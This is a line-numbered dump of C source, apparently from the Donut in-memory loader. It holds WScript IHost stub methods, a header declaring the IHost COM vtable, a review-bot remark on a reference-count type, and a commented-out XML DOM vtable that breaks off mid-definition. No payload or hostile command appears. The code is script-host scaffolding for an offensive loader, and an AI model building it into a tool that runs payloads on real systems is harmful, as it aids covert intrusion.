186 static HRESULT WINAPI Host_get_FullName(IHost *iface, BSTR *out_Path) {
187 DPRINT("WScript::FullName");
188
189 return E_NOTIMPL;
190 }
191
192 static HRESULT WINAPI Host_get_Path(IHost *iface, BSTR *out_Path) {
193 DPRINT("WScript::Path");
194
195 return E_NOTIMPL;
196 }
197
198 // Gets the script mode, or identifies the script mode.
199 static HRESULT WINAPI Host_get_Interactive(IHost *iface, VARIANT_BOOL *out_Interactive) {
200 DPRINT("WScript::get_Interactive");
201
202 return E_NOTIMPL;
203 }
204
205 // Sets the script mode, or identifies the script mode.
206 static HRESULT WINAPI Host_put_Interactive(IHost *iface, VARIANT_BOOL v) {
207 DPRINT("WScript::put_Interactive");
208
209 return E_NOTIMPL;
210 }
211
212 // Forces script execution to stop at any time.
213 static HRESULT WINAPI Host_Quit(IHost *iface, int ExitCode) {
214 DPRINT("WScript::Quit(%i)", ExitCode);
215
216 // if you know of a better way to do this..let me know.
217 iface->lpEngine->lpVtbl->InterruptScriptThread(iface->lpEngine, SCRIPTTHREADID_CURRENT, NULL, 0);
218
219 return S_OK;
220 }
221
222 // Returns the file name of the currently running script.
223 static HRESULT WINAPI Host_get_ScriptName(IHost *iface, BSTR *out_ScriptName) {
224 DPRINT("WScript::ScriptName");
225
226 return E_NOTIMPL;
227 }
228
229 // Returns the full path of the currently running script.
230 static HRESULT WINAPI Host_get_ScriptFullName(IHost *iface, BSTR *out_ScriptFullName) {
231 DPRINT("WScript::ScriptFullName");
232
233 return E_NOTIMPL;
234 }
235
236 // Returns the WshArguments object (a collection of arguments).
237 static HRESULT WINAPI Host_get_Arguments(
238 IHost *iface, void **out_Arguments) { // IArguments2
239 DPRINT("WScript::Arguments");
240
241 return E_NOTIMPL;
242 }
243
244 static HRESULT WINAPI Host_get_Version(IHost *iface, BSTR *out_Version) {
245 DPRINT("WScript::Version");
246
247 return E_NOTIMPL;
248 }
249
250 // Returns the Windows Script Host build version number.
251 static HRESULT WINAPI Host_get_BuildVersion(IHost *iface, int *out_Build) {
252 DPRINT("WScript::BuildVersion");
253
254 return E_NOTIMPL;
255 }
256
257 static HRESULT WINAPI Host_get_Timeout(IHost *iface, LONG *out_Timeout) {
258 DPRINT("WScript::get_Timeout");
259
260 return E_NOTIMPL;
261 }
262
263 static HRESULT WINAPI Host_put_Timeout(IHost *iface, LONG v) {
264 DPRINT("WScript::put_Timeout");
265
266 return E_NOTIMPL;
267 }
268
269 // Connects the object's event sources to functions with a given prefix.
270 static HRESULT WINAPI Host_CreateObject(IHost *iface, BSTR ProgID, BSTR Prefix,
271 IDispatch **out_Dispatch) {
272 DPRINT("WScript::CreateObject");
273
274 return E_NOTIMPL;
275 }
276
277 // Outputs text to either a message box or the command console window.
278 static HRESULT WINAPI Host_Echo(
279 IHost *iface, SAFEARRAY *args) {
280 DPRINT("WScript::Echo");
281
282 return E_NOTIMPL;
283 }
284
285 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
286 static HRESULT WINAPI Host_GetObject(
287 IHost *iface, BSTR Pathname, BSTR ProgID,
288 BSTR Prefix, IDispatch **out_Dispatch) {
289 DPRINT("WScript::GetObject");
290
291 return E_NOTIMPL;
292 }
293
294 // Disconnects a connected object's event sources.
295 static HRESULT WINAPI Host_DisconnectObject(
296 IHost *iface, IDispatch *Object) {
297 DPRINT("WScript::DisconnectObject");
298
299 return E_NOTIMPL;
300 }
301
302 // Suspends script execution for a specified length of time, then continues execution.
303 static HRESULT WINAPI Host_Sleep(
304 IHost *iface, LONG Time) {
305
306 DPRINT("WScript::Sleep");
307 iface->inst->api.Sleep((DWORD)Time);
308
309 return S_OK;
310 }
311
312 // Connects the object's event sources to functions with a given prefix.
313 static HRESULT WINAPI Host_ConnectObject(
314 IHost *iface, IDispatch *Object, BSTR Prefix) {
315 DPRINT("WScript::ConnectObject");
316
317 return E_NOTIMPL;
318 }
319
320 // Exposes the read-only input stream for the current script.
321 static HRESULT WINAPI Host_get_StdIn(
322 IHost *iface, void **ppts) { // ppts is ITextStream
323 DPRINT("WScript::StdIn");
324
325 return E_NOTIMPL;
326 }
327
328 // Exposes the write-only output stream for the current script.
329 static HRESULT WINAPI Host_get_StdOut(
330 IHost *iface, void **ppts) { // ppts is ITextStream
331 DPRINT("WScript::StdOut");
332
333 return E_NOTIMPL;
334 }
335
336 // Exposes the write-only error output stream for the current script.
337 static HRESULT WINAPI Host_get_StdErr(
338 IHost *iface, void **ppts) { // ppts is ITextStream
339 DPRINT("WScript::StdErr");
340
341 return E_NOTIMPL;
342 }
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WSCRIPT_H
32 #define WSCRIPT_H
33
34 #include "../include/donut.h"
35
36 typedef struct _IHost IHost;
37
38 typedef struct _IHostVtbl {
39 BEGIN_INTERFACE
40
41 HRESULT (STDMETHODCALLTYPE *QueryInterface)(
42 IHost *This,
43 REFIID riid,
44 void **ppvObject);
45
46 ULONG (STDMETHODCALLTYPE *AddRef)(IHost *This);
47
48 ULONG (STDMETHODCALLTYPE *Release)(IHost *This);
49
50 HRESULT (STDMETHODCALLTYPE *GetTypeInfoCount)(
51 IHost *This,
52 UINT *pctinfo);
53
54 HRESULT (STDMETHODCALLTYPE *GetTypeInfo)(
55 IHost *This,
56 UINT iTInfo,
57 LCID lcid,
58 ITypeInfo **ppTInfo);
59
60 HRESULT (STDMETHODCALLTYPE *GetIDsOfNames)(
61 IHost *This,
62 REFIID riid,
63 LPOLESTR *rgszNames,
64 UINT cNames,
65 LCID lcid,
66 DISPID *rgDispId);
67
68 HRESULT (STDMETHODCALLTYPE *Invoke)(
69 IHost *This,
70 DISPID dispIdMember,
71 REFIID riid,
72 LCID lcid,
73 WORD wFlags,
74 DISPPARAMS *pDispParams,
75 VARIANT *pVarResult,
76 EXCEPINFO *pExcepInfo,
77 UINT *puArgErr);
78
79 HRESULT (STDMETHODCALLTYPE *get_Name)(
80 IHost *This,
81 BSTR *out_Name);
82
83 HRESULT (STDMETHODCALLTYPE *get_Application)(
84 IHost *This,
85 IDispatch **out_Dispatch);
86
87 HRESULT (STDMETHODCALLTYPE *get_FullName)(
88 IHost *This,
89 BSTR *out_Path);
90
91 HRESULT (STDMETHODCALLTYPE *get_Path)(
92 IHost *This,
93 BSTR *out_Path);
94
95 HRESULT (STDMETHODCALLTYPE *get_Interactive)(
96 IHost *This,
97 VARIANT_BOOL *out_Interactive);
98
99 HRESULT (STDMETHODCALLTYPE *put_Interactive)(
100 IHost *This,
101 VARIANT_BOOL v);
102
103 HRESULT (STDMETHODCALLTYPE *Quit)(
104 IHost *This,
105 int ExitCode);
106
107 HRESULT (STDMETHODCALLTYPE *get_ScriptName)(
108 IHost *This,
109 BSTR *out_ScriptName);
110
111 HRESULT (STDMETHODCALLTYPE *get_ScriptFullName)(
112 IHost *This,
113 BSTR *out_ScriptFullName);
114
115 HRESULT (STDMETHODCALLTYPE *get_Arguments)(
116 IHost *This,
117 void **out_Arguments);
118
119 HRESULT (STDMETHODCALLTYPE *get_Version)(
120 IHost *This,
121 BSTR *out_Version);
122
123 HRESULT (STDMETHODCALLTYPE *get_BuildVersion)(
124 IHost *This,
125 int *out_Build);
126
127 HRESULT (STDMETHODCALLTYPE *get_Timeout)(
128 IHost *This,
129 LONG *out_Timeout);
130
131 HRESULT (STDMETHODCALLTYPE *put_Timeout)(
132 IHost *This,
133 LONG v);
134
135 HRESULT (STDMETHODCALLTYPE *CreateObject)(
136 IHost *This,
137 BSTR ProgID,
138 BSTR Prefix,
139 IDispatch **out_Dispatch);
140
141 HRESULT (STDMETHODCALLTYPE *Echo)(
142 IHost *This,
143 SAFEARRAY *args);
144
145 HRESULT (STDMETHODCALLTYPE *GetObject)(
146 IHost *This,
147 BSTR Pathname,
148 BSTR ProgID,
149 BSTR Prefix,
150 IDispatch **out_Dispatch);
151
152 HRESULT (STDMETHODCALLTYPE *DisconnectObject)(
153 IHost *This,
154 IDispatch *Object);
155
156 HRESULT (STDMETHODCALLTYPE *Sleep)(
157 IHost *This,
158 LONG Time);
159
160 HRESULT (STDMETHODCALLTYPE *ConnectObject)(
161 IHost *This,
162 IDispatch *Object,
163 BSTR Prefix);
164
165 HRESULT (STDMETHODCALLTYPE *get_StdIn)(
166 IHost *This,
167 void **ppts);
168
169 HRESULT (STDMETHODCALLTYPE *get_StdOut)(
170 IHost *This,
171 void **ppts);
172
173 HRESULT (STDMETHODCALLTYPE *get_StdErr)(
174 IHost *This,
175 void **ppts);
176
177 END_INTERFACE
178 } IHostVtbl;
179
180 typedef struct _IHost {
181 IHostVtbl *lpVtbl; // virtual function table
182 ITypeLib *lpTypeLib; // type library
183 ITypeInfo *lpTypeInfo; // type information for WScript properties/methods
184 IActiveScript *lpEngine; // IActiveScript engine from main thread
185 ULONG m_cRef; // reference count
186 PDONUT_INSTANCE inst;
187 } IHost;
188
189 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host);
190
191 // Queries a COM object for a pointer to one of its interface.
192 static STDMETHODIMP Host_QueryInterface(IHost *This, REFIID riid, void **ppv);
193
194 // Increments the reference count for an interface pointer to a COM object.
195 static STDMETHODIMP_(ULONG) Host_AddRef(IHost *This);
196
197 // Decrements the reference count for an interface on a COM object.
198 static STDMETHODIMP_(ULONG) Host_Release(IHost *This);
199
200 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
201 static STDMETHODIMP Host_GetTypeInfoCount(IHost *This, UINT *pctinfo);
202
203 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
204 static STDMETHODIMP Host_GetTypeInfo(IHost *This, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo);
205
206 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
207 // which can be used on subsequent calls to Invoke.
208 static STDMETHODIMP Host_GetIDsOfNames(
209 IHost *This, REFIID riid, LPOLESTR *rgszNames,
210 UINT cNames, LCID lcid, DISPID *rgDispId);
211
212 // Provides access to properties and methods exposed by an object.
213 // The dispatch function DispInvoke provides a standard implementation of Invoke.
214 static STDMETHODIMP Host_Invoke(
215 IHost *This, DISPID dispIdMember, REFIID riid,
216 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
217 EXCEPINFO *pExcepInfo, UINT *puArgErr);
218
219 // Returns the name of the WScript object (the host executable file).
220 static STDMETHODIMP Host_get_Name(IHost *This, BSTR *out_Name);
221
222 static STDMETHODIMP Host_get_Application(IHost *This, IDispatch **out_Dispatch);
223
224 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
225 static STDMETHODIMP Host_get_FullName(IHost *This, BSTR *out_Path);
226
227 static STDMETHODIMP Host_get_Path(IHost *This, BSTR *out_Path);
228
229 // Gets the script mode, or identifies the script mode.
230 static STDMETHODIMP Host_get_Interactive(IHost *This, VARIANT_BOOL *out_Interactive);
231
232 // Sets the script mode, or identifies the script mode.
233 static STDMETHODIMP Host_put_Interactive(IHost *This, VARIANT_BOOL v);
234
235 // Forces script execution to stop at any time.
236 static STDMETHODIMP Host_Quit(IHost *This, int ExitCode);
237
238 // Returns the file name of the currently running script.
239 static STDMETHODIMP Host_get_ScriptName(IHost *This, BSTR *out_ScriptName);
240
241 // Returns the full path of the currently running script.
242 static STDMETHODIMP Host_get_ScriptFullName(IHost *This, BSTR *out_ScriptFullName);
243
244 // Returns the WshArguments object (a collection of arguments).
245 static STDMETHODIMP Host_get_Arguments(IHost *This, void **out_Arguments);
246
247 static STDMETHODIMP Host_get_Version(IHost *This, BSTR *out_Version);
248
249 // Returns the Windows Script Host build version number.
250 static STDMETHODIMP Host_get_BuildVersion(IHost *This, int *out_Build);
251
252 static STDMETHODIMP Host_get_Timeout(IHost *This, LONG *out_Timeout);
253
254 static STDMETHODIMP Host_put_Timeout(IHost *This, LONG v);
255
256 // Connects the object's event sources to functions with a given prefix.
257 static STDMETHODIMP Host_CreateObject(IHost *This, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
258
259 // Outputs text to either a message box or the command console window.
260 static STDMETHODIMP Host_Echo(IHost *This, SAFEARRAY *args);
261
262 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
263 static STDMETHODIMP Host_GetObject(IHost *This, BSTR Pathname, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
264
265 // Disconnects a connected object's event sources.
266 static STDMETHODIMP Host_DisconnectObject(IHost *This, IDispatch *Object);
267
268 // Suspends script execution for a specified length of time, then continues execution.
269 static STDMETHODIMP Host_Sleep(IHost *This, LONG Time);
270
271 // Connects the object's event sources to functions with a given prefix.
272 static STDMETHODIMP Host_ConnectObject(IHost *This, IDispatch *Object, BSTR Prefix);
273
274 // Exposes the read-only input stream for the current script.
275 static STDMETHODIMP Host_get_StdIn(IHost *This, void **ppts);
276
277 // Exposes the write-only output stream for the current script.
278 static STDMETHODIMP Host_get_StdOut(IHost *This, void **ppts);
279
280 // Exposes the write-only error output stream for the current script.
281 static STDMETHODIMP Host_get_StdErr(IHost *This, void **ppts);
282
283 #endif
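Review bot: `ULONG m_cRef;` in the `_IHost` struct does not match how the counter is used. The `Host_Release` implementation shown earlier on the page passes `&iface->m_cRef` to `_InterlockedDecrement`, which takes a `long volatile *`. Declaring the field as `LONG m_cRef; // reference count, updated with _Interlocked*` (or casting at the call sites) removes the pointer-type mismatch. The comment above the `Host_CreateObject` prototype also repeats the `ConnectObject` text; something like `// Creates a COM object from a ProgID (currently returns E_NOTIMPL).` would describe it. The `inst` member is the only field without a comment, and `// loader instance; supplies api.Sleep for Host_Sleep` would match that function's visible use of it.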
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 /**
32 typedef struct IXMLDOMNodeVtbl {
33 BEGIN_INTERFACE
34
35 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
36 IXMLDOMNode * This,
37 REFIID riid,
38 void **ppvObject);
39
40 ULONG ( STDMETHODCALLTYPE *AddRef )(
41 IXMLDOMNode * This);
42
43 ULONG ( STDMETHODCALLTYPE *Release )(
44 IXMLDOMNode * This);
45
46 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
47 IXMLDOMNode * This,
48 UINT *pctinfo);
49
50 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
51 IXMLDOMNode * This,
52 UINT iTInfo,
53 LCID lcid,
54 ITypeInfo **ppTInfo);
55
56 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
57 IXMLDOMNode * This,
58 REFIID riid,
59 LPOLESTR *rgszNames,
60 UINT cNames,
61 LCID lcid,
62 DISPID *rgDispId);
63
64 HRESULT ( STDMETHODCALLTYPE *Invoke )(
65 IXMLDOMNode * This,
66 DISPID dispIdMember,
67 REFIID riid,
68 LCID lcid,
69 WORD wFlags,
70 DISPPARAMS *pDispParams,
71 VARIANT *pVarResult,
72 EXCEPINFO *pExcepInfo,
73 UINT *puArgErr);
74
75 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
76 IXMLDOMNode * This,
77 BSTR *name);
78
79 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
80 IXMLDOMNode * This,
81 VARIANT *value);
82
83 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
84 IXMLDOMNode * This,
85 VARIANT value);
86
87 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
88 IXMLDOMNode * This,
89 DOMNodeType *type);
90
91 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
92 IXMLDOMNode * This,
93 IXMLDOMNode **parent);
94
95 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
96 IXMLDOMNode * This,
97 IXMLDOMNodeList **childList);
98
99 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
100 IXMLDOMNode * This,
101 IXMLDOMNode **firstChild);
102
103 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
104 IXMLDOMNode * This,
105 IXMLDOMNode **lastChild);
106
107 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
108 IXMLDOMNode * This,
109 IXMLDOMNode **previousSibling);
110
111 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
112 IXMLDOMNode * This,
113 IXMLDOMNode **nextSibling);
114
115 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
116 IXMLDOMNode * This,
117 IXMLDOMNamedNodeMap **attributeMap);
118
119 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
120 IXMLDOMNode * This,
121 IXMLDOMNode *newChild,
122 VARIANT refChild,
123 IXMLDOMNode **outNewChild);
124
125 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
126 IXMLDOMNode * This,
127 IXMLDOMNode *newChild,
128 IXMLDOMNode *oldChild,
129 IXMLDOMNode **outOldChild);
130
131 HRESULT ( STDMETHODCALLTYPE *removeChild )(
132 IXMLDOMNode * This,
133 IXMLDOMNode *childNode,
134 IXMLDOMNode **oldChild);
135
136 HRESULT ( STDMETHODCALLTYPE *appendChild )(
137 IXMLDOMNode * This,
138 IXMLDOMNode *newChild,
139 IXMLDOMNode **outNewChild);
140
141 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
142 IXMLDOMNode * This,
143 VARIANT_BOOL *hasChild);
144
145 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
146 IXMLDOMNode * This,
147 IXMLDOMDocument **XMLDOMDocument);
148
149 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
150 IXMLDOMNode * This,
151 VARIANT_BOOL deep,
152 IXMLDOMNode **cloneRoot);
153
154 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
155 IXMLDOMNode * This,
156 BSTR *nodeType);
157
158 HRESULT ( STDMETHODCALLTYPE *get_text )(
159 IXMLDOMNode * This,
160 BSTR *text);
161
162 HRESULT ( STDMETHODCALLTYPE *put_text )(
163 IXMLDOMNode * This,
164 BSTR text);
165
166 HRESULT ( STDMETHODCALLTYPE *get_specified )(
167 IXMLDOMNode * This,
168 VARIANT_BOOL *isSpecified);
169
170 HRESULT ( STDMETHODCALLTYPE *get_definition )(
171 IXMLDOMNode * This,
172 IXMLDOMNode **definitionNode);
173
174 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
175 IXMLDOMNode * This,
176 VARIANT *typedValue);
177
178 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
179 IXMLDOMNode * This,
180 VARIANT typedValue);
181
182 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
183 IXMLDOMNode * This,
184 VARIANT *dataTypeName);
185
186 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
187 IXMLDOMNode * This,
188 BSTR dataTypeName);
189
190 HRESULT ( STDMETHODCALLTYPE *get_xml )(
191 IXMLDOMNode * This,
192 BSTR *xmlString);
193
194 HRESULT ( STDMETHODCALLTYPE *transformNode )(
195 IXMLDOMNode * This,
196 IXMLDOMNode *stylesheet,
197 BSTR *xmlString);
198
199 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
200 IXMLDOMNode * This,
201 BSTR queryString,
202 IXMLDOMNodeList **resultList);
203
204 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
205 IXMLDOMNode * This,
206 BSTR queryString,
207 IXMLDOMNode **resultNode);
208
209 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
210 IXMLDOMNode * This,
211 VARIANT_BOOL *isParsed);
212
213 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
214 IXMLDOMNode * This,
215 BSTR *namespaceURI);
216
217 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
218 IXMLDOMNode * This,
219 BSTR *prefixString);
220
221 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
222 IXMLDOMNode * This,
223 BSTR *nameString);
224
225 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
226 IXMLDOMNode * This,
227 IXMLDOMNode *stylesheet,
228 VARIANT outputObject);
229
230 END_INTERFACE
231 } IXMLDOMNodeVtbl;
232
233 typedef struct _IXMLDOMNode {
234 IXMLDOMNodeVtbl *lpVtbl;
235 } XMLDOMNode;
236
237 typedef struct IXMLDOMDocumentVtbl {
238 BEGIN_INTERFACE
239
240 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
241 IXMLDOMDocument * This,
242 REFIID riid,
243
244 __RPC__deref_out void **ppvObject);
245
246 ULONG ( STDMETHODCALLTYPE *AddRef )(
247 IXMLDOMDocument * This);
248
249 ULONG ( STDMETHODCALLTYPE *Release )(
250 IXMLDOMDocument * This);
251
252 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
253 IXMLDOMDocument * This,
254 UINT *pctinfo);
255
256 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
257 IXMLDOMDocument * This,
258 UINT iTInfo,
259 LCID lcid,
260 ITypeInfo **ppTInfo);
261
262 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
263 IXMLDOMDocument * This,
264 REFIID riid,
265 LPOLESTR *rgszNames,
266 UINT cNames,
267 LCID lcid,
268 DISPID *rgDispId);
269
270 HRESULT ( STDMETHODCALLTYPE *Invoke )(
271 IXMLDOMDocument * This,
272 DISPID dispIdMember,
273 REFIID riid,
274 LCID lcid,
275 WORD wFlags,
276 DISPPARAMS *pDispParams,
277 VARIANT *pVarResult,
278 EXCEPINFO *pExcepInfo,
279 UINT *puArgErr);
280
281 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
282 IXMLDOMDocument * This,
283 BSTR *name);
284
285 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
286 IXMLDOMDocument * This,
287 VARIANT *value);
288
289 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
290 IXMLDOMDocument * This,
291 VARIANT value);
292
293 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
294 IXMLDOMDocument * This,
295 DOMNodeType *type);
296
297 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
298 IXMLDOMDocument * This,
299 IXMLDOMNode **parent);
300
301 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
302 IXMLDOMDocument * This,
303 IXMLDOMNodeList **childList);
304
305 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
306 IXMLDOMDocument * This,
307 IXMLDOMNode **firstChild);
308
309 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
310 IXMLDOMDocument * This,
311 IXMLDOMNode **lastChild);
312
313 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
314 IXMLDOMDocument * This,
315 IXMLDOMNode **previousSibling);
316
317 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
318 IXMLDOMDocument * This,
319 IXMLDOMNode **nextSibling);
320
321 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
322 IXMLDOMDocument * This,
323 IXMLDOMNamedNodeMap **attributeMap);
324
325 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
326 IXMLDOMDocument * This,
327 IXMLDOMNode *newChild,
328 VARIANT refChild,
329 IXMLDOMNode **outNewChild);
330
331 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
332 IXMLDOMDocument * This,
333 IXMLDOMNode *newChild,
334 IXMLDOMNode *oldChild,
335 IXMLDOMNode **outOldChild);
336
337 HRESULT ( STDMETHODCALLTYPE *removeChild )(
338 IXMLDOMDocument * This,
339 IXMLDOMNode *childNode,
340 IXMLDOMNode **oldChild);
341
342 HRESULT ( STDMETHODCALLTYPE *appendChild )(
343 IXMLDOMDocument * This,
344 IXMLDOMNode *newChild,
345 IXMLDOMNode **outNewChild);
346
347 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
348 IXMLDOMDocument * This,
349 VARIANT_BOOL *hasChild);
350
351 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
352 IXMLDOMDocument * This,
353 IXMLDOMDocument **XMLDOMDocument);
354
355 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
356 IXMLDOMDocument * This,
357 VARIANT_BOOL deep,
358 IXMLDOMNode **cloneRoot);
359
360 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
361 IXMLDOMDocument * This,
362 BSTR *nodeType);
363
364 HRESULT ( STDMETHODCALLTYPE *get_text )(
365 IXMLDOMDocument * This,
366 BSTR *text);
367
368 HRESULT ( STDMETHODCALLTYPE *put_text )(
369 IXMLDOMDocument * This,
370 BSTR text);
371
372 HRESULT ( STDMETHODCALLTYPE *get_specified )(
373 IXMLDOMDocument * This,
374 VARIANT_BOOL *isSpecified);
375
376 HRESULT ( STDMETHODCALLTYPE *get_definition )(
377 IXMLDOMDocument * This,
378 IXMLDOMNode **definitionNode);
379
380 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
381 IXMLDOMDocument * This,
382 VARIANT *typedValue);
383
384 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
385 IXMLDOMDocument * This,
386 VARIANT typedValue);
387
388 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
389 IXMLDOMDocument * This,
390 VARIANT *dataTypeName);
391
392 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
393 IXMLDOMDocument * This,
394 BSTR dataTypeName);
395
396 HRESULT ( STDMETHODCALLTYPE *get_xml )(
397 IXMLDOMDocument * This,
398 BSTR *xmlString);
399
400 HRESULT ( STDMETHODCALLTYPE *transformNode )(
401 IXMLDOMDocument * This,
402 IXMLDOMNode *stylesheet,
403 BSTR *xmlString);
404
405 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
406 IXMLDOMDocument * This,
407 BSTR queryString,
408 IXMLDOMNodeList **resultList);
409
410 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
411 IXMLDOMDocument * This,
412 BSTR queryString,
413 IXMLDOMNode **resultNode);
414
415 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
416 IXMLDOMDocument * This,
417 VARIANT_BOOL *isParsed);
418
419 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
420 IXMLDOMDocument * This,
421 BSTR *namespaceURI);
422
423 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
424 IXMLDOMDocument * This,
425 BSTR *prefixString);
426
427 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
428 IXMLDOMDocument * This,
429 BSTR *nameString);
430
431 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
432 IXMLDOMDocument * This,
433 IXMLDOMNode *stylesheet,
434 VARIANT outputObject);
435
436 HRESULT ( STDMETHODCALLTYPE *get_doctype )(
437 IXMLDOMDocument * This,
438 IXMLDOMDocumentType **documentType);
439
440 HRESULT ( STDMETHODCALLTYPE *get_implementation )(
